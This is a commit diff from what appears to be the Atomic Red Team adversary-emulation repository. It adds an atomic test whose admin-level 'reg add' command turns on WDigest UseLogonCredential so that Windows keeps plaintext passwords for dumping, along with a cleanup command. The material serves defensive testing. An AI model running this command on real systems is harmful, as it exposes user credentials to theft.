security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2019-09-17 14:45:16 +00:00
parent 8b855a5139
commit ff779dd2fb
4 changed files with 41 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1112/T1112.md
+22
View File
@@ -16,6 +16,8 @@ The Registry of a remote system may be modified to aid in execution of files as
- [Atomic Test #3 - Modify Registry of Another User Profile](#atomic-test-3---modify-registry-of-another-user-profile)
- [Atomic Test #4 - Modify registry for password downgrade to plain text](#atomic-test-4---modify-registry-for-password-downgrade-to-plain-text)
<br/>
@@ -116,4 +118,24 @@ reg unload "HKU\$($ProfileList[$p].SID)"
<br/>
<br/>
## Atomic Test #4 - Modify registry for password downgrade to plain text
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
```
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
```
#### Cleanup Commands:
```
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
```
<br/>
atomics/index.md
+1
View File
@@ -282,6 +282,7 @@
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify Registry of Another User Profile [windows]
- Atomic Test #4: Modify registry for password downgrade to plain text [windows]
- [T1170 Mshta](./T1170/T1170.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- [T1096 NTFS File Attributes](./T1096/T1096.md)
atomics/index.yaml
+17
View File
@@ -8156,6 +8156,23 @@ defense-evasion:
### Garbage collection and closing of ntuser.dat ###
[gc]::Collect()
reg unload "HKU\$($ProfileList[$p].SID)"
- name: Modify registry for password downgrade to plain text
description: "Sets registry key that will tell windows to store plaintext passwords
(making the system vulnerable to clear text / cleartext password dumping)
\n"
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 1 /f
'
cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 0 /f
'
T1170:
technique:
external_references:
atomics/windows-index.md
+1
View File
@@ -89,6 +89,7 @@
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify Registry of Another User Profile [windows]
- Atomic Test #4: Modify registry for password downgrade to plain text [windows]
- [T1170 Mshta](./T1170/T1170.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- [T1096 NTFS File Attributes](./T1096/T1096.md)